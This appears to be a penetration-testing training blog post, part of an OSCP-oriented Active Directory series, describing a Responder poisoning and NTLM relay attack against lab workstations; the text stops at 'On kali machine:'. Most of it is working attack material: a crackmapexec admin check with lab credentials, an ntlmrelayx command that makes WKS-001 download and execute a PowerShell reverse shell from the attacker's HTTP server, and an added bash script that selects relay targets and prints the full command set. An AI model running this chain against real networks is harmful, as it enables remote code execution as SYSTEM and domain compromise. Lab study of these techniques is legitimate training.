Hi everyone,
So far so good. I hope that you have read my latest posts on the roadtoOSCP blog: Active Directory series [I], Active Directory series [II] and Active Directory series [III].
There I described the architecture, the environment, the Responder attack and the SMB relay attack that dumps NTLM hashes; you should understand those previous steps, because they are very important for continuing with this entry.
We are going to move up to the next level! This is the main goal and the most complex attack (of the day), because we want to increase our penetration tester level on corporate domains. It is defined and implemented in the following architecture design:
ATTACK DEVELOPMENT STEP BY STEP:
1. In order to perform this attack successfully, the user pwned in the previous post Active Directory series [II] (CORPORATIVE\worker2) must be logged on to the WKS-002 machine.
 
2. The compromised user must also have local administrator privileges on WKS-001, the machine the authentication will be relayed to, and WKS-001 must not require SMB signing (a host that enforces signing rejects a relayed session).
Validate the admin rights with crackmapexec. The "(Pwn3d!)" tag marks the hosts where worker2 is a local administrator, and "(signing:False)" marks the hosts that accept a relayed NTLM authentication:
crackmapexec smb 10.0.2.0/24 -u "worker2" -p "Passw0rd1"
SMB 10.0.2.15 445 WKS-001 [*] Windows 10.0 Build 16299 x64 (name:WKS-001) (domain:CORPORATIVE.DOMAIN.local) (signing:False) (SMBv1:False)
SMB 10.0.2.16 445 WKS-002 [*] Windows 10.0 Build 19041 x64 (name:WKS-002) (domain:CORPORATIVE.DOMAIN.local) (signing:False) (SMBv1:False)
SMB 10.0.2.17 445 CORPORATIVE-DOM [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:CORPORATIVE-DOM) (domain:CORPORATIVE.DOMAIN.local) (signing:True) (SMBv1:True)
SMB 10.0.2.15 445 WKS-001 [+] CORPORATIVE.DOMAIN.local\worker2:Passw0rd1 (Pwn3d!)
SMB 10.0.2.16 445 WKS-002 [+] CORPORATIVE.DOMAIN.local\worker2:Passw0rd1
SMB 10.0.2.17 445 CORPORATIVE-DOM [+] CORPORATIVE.DOMAIN.local\worker2:Passw0rd1
Attack Process:
1. The worker2 user is logged on to WKS-002 and tries to access a share resource that does not exist (or is unavailable at that moment), so Windows falls back to LLMNR/NBT-NS name resolution.
2. The attacker machine (running Responder) poisons the response to this request and redirects the client to the attacker, where the client performs SMB authentication against ntlmrelayx, which is listening on the attacker machine. Responder's own SMB and HTTP servers must be turned off in Responder.conf so that ntlmrelayx, not Responder, receives the authentication. ntlmrelayx then performs two actions:
2.1 Capture the NTLM authentication that WKS-002 (10.0.2.16) sends to the attacker.
2.2 Relay that authentication to WKS-001 (10.0.2.15) and, because worker2 is a local administrator there, execute a command with administrative privileges.
sudo python3 /usr/share/doc/python3-impacket/examples/ntlmrelayx.py -t 10.0.2.15 -c "powershell IEX(new-object net.webclient).DownloadString('http://10.0.2.19:8989/Invoke-PowerShellTcp.ps1')" -smb2support
This command achieves remote code execution on WKS-001 (through the relayed SMB session, not through a software vulnerability), using WKS-002 as a bridge: the domain user worker2 has administrative privileges over WKS-001, so the relayed session can create and run a service there. The relay needs a second machine because Windows blocks reflecting an authentication back to the host it came from (MS08-068).
3. The command orders the target machine WKS-001 (10.0.2.15) to download and execute the PowerShell script Invoke-PowerShellTcp.ps1 (modified so that the function is invoked right after it is loaded into memory) from the following HTTP server, which is running on the attacker machine on port 8989:
root@kali:/home/kali# python3 -m http.server 8989
Serving HTTP on 0.0.0.0 port 8989 (http://0.0.0.0:8989/) ...
10.0.2.15 - - [13/Sep/2021 22:01:01] "GET /Invoke-PowerShellTcp.ps1 HTTP/1.1" 200 -
4. The target machine WKS-001 loads the script and invokes it with the IEX command provided in step 2.2. Because ntlmrelayx runs the command through a service it creates over SMB, the script runs with NT AUTHORITY\SYSTEM privileges. The script then spawns a reverse shell over TCP to the attacker machine 10.0.2.19 on port 4545, where a listener must already be waiting:
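To tie the admin/signing check and the relay steps above together, here is an added helper script (example code written for this edit, not part of the original post and not code from the Impacket or Responder projects). It takes the crackmapexec output shown under "Validate the admin rights", picks the relay targets (hosts reporting signing:False, excluding the host whose authentication is being relayed, since reflecting it back to WKS-002 itself does not work), rewrites a constructed Responder.conf "Servers to start" fragment so Responder's SMB and HTTP servers are off and ntlmrelayx receives the authentication, and prints the ntlmrelayx command line in the same shape as step 2.2. The crackmapexec lines and the Responder.conf fragment are constructed sample input embedded in the script; the attacker IP 10.0.2.19, the HTTP port 8989 and the reverse shell port 4545 are the values from this post.

```bash
#!/usr/bin/env bash
# Added example for this post (not original post content): choose NTLM relay
# targets from crackmapexec output and prepare Responder for ntlmrelayx.

# Constructed sample input: the crackmapexec lines shown earlier in the post.
CME_OUTPUT='SMB 10.0.2.15 445 WKS-001 [*] Windows 10.0 Build 16299 x64 (name:WKS-001) (domain:CORPORATIVE.DOMAIN.local) (signing:False) (SMBv1:False)
SMB 10.0.2.16 445 WKS-002 [*] Windows 10.0 Build 19041 x64 (name:WKS-002) (domain:CORPORATIVE.DOMAIN.local) (signing:False) (SMBv1:False)
SMB 10.0.2.17 445 CORPORATIVE-DOM [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:CORPORATIVE-DOM) (domain:CORPORATIVE.DOMAIN.local) (signing:True) (SMBv1:True)'

# Constructed sample input: the "Servers to start" part of a default Responder.conf.
RESPONDER_CONF='[Responder Core]
; Servers to start
SQL = On
SMB = On
RDP = On
Kerberos = On
FTP = On
POP = On
SMTP = On
IMAP = On
HTTP = On
HTTPS = On
DNS = On
LDAP = On'

# relay_targets [victim_ip]
# Prints one IP per line for every host that does NOT require SMB signing.
# Hosts with signing:True (here the DC) reject a relayed session, and the
# victim itself is excluded because reflecting its own authentication back
# to it is blocked by Windows (MS08-068), hence the WKS-002 -> WKS-001 hop.
relay_targets() {
    rt_victim="${1:-}"
    printf '%s\n' "$CME_OUTPUT" \
        | awk -v victim="$rt_victim" '/\(signing:False\)/ && $2 != victim { print $2 }'
}

# responder_conf_for_relay
# Prints the Responder.conf fragment with SMB and HTTP turned off. If Responder
# answers SMB/HTTP itself it captures the hash and ntlmrelayx never sees the
# authentication to relay. HTTPS and the other servers stay as they are.
responder_conf_for_relay() {
    printf '%s\n' "$RESPONDER_CONF" | sed -E 's/^(SMB|HTTP) = On$/\1 = Off/'
}

# ntlmrelayx_cmd <target_ip> <attacker_ip> <http_port>
# Prints the ntlmrelayx invocation in the same shape as step 2.2 of the post
# (the post runs it from /usr/share/doc/python3-impacket/examples/ with sudo).
ntlmrelayx_cmd() {
    nr_target="$1"; nr_lhost="$2"; nr_hport="$3"
    printf "ntlmrelayx.py -t %s -smb2support -c \"powershell IEX(new-object net.webclient).DownloadString('http://%s:%s/Invoke-PowerShellTcp.ps1')\"\n" \
        "$nr_target" "$nr_lhost" "$nr_hport"
}

main() {
    victim=10.0.2.16   # WKS-002: the host whose user triggers the name lookup
    lhost=10.0.2.19    # attacker machine from the post
    echo "### Relay targets (signing off, victim $victim excluded):"
    relay_targets "$victim"
    echo
    echo "### Responder.conf servers section for use with ntlmrelayx:"
    responder_conf_for_relay
    echo
    echo "### On the attacker: reverse shell listener, HTTP server, then ntlmrelayx:"
    echo "nc -lvnp 4545"
    echo "python3 -m http.server 8989"
    for t in $(relay_targets "$victim"); do
        ntlmrelayx_cmd "$t" "$lhost" 8989
    done
}

main
```

Running it prints 10.0.2.15 as the only valid target for an authentication coming from WKS-002 (the DC is excluded by signing:True, WKS-002 by the reflection rule), the Responder.conf lines with SMB and HTTP set to Off, and the three commands to start in separate terminals before worker2 triggers the lookup.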
Attack execution:
On kali machine: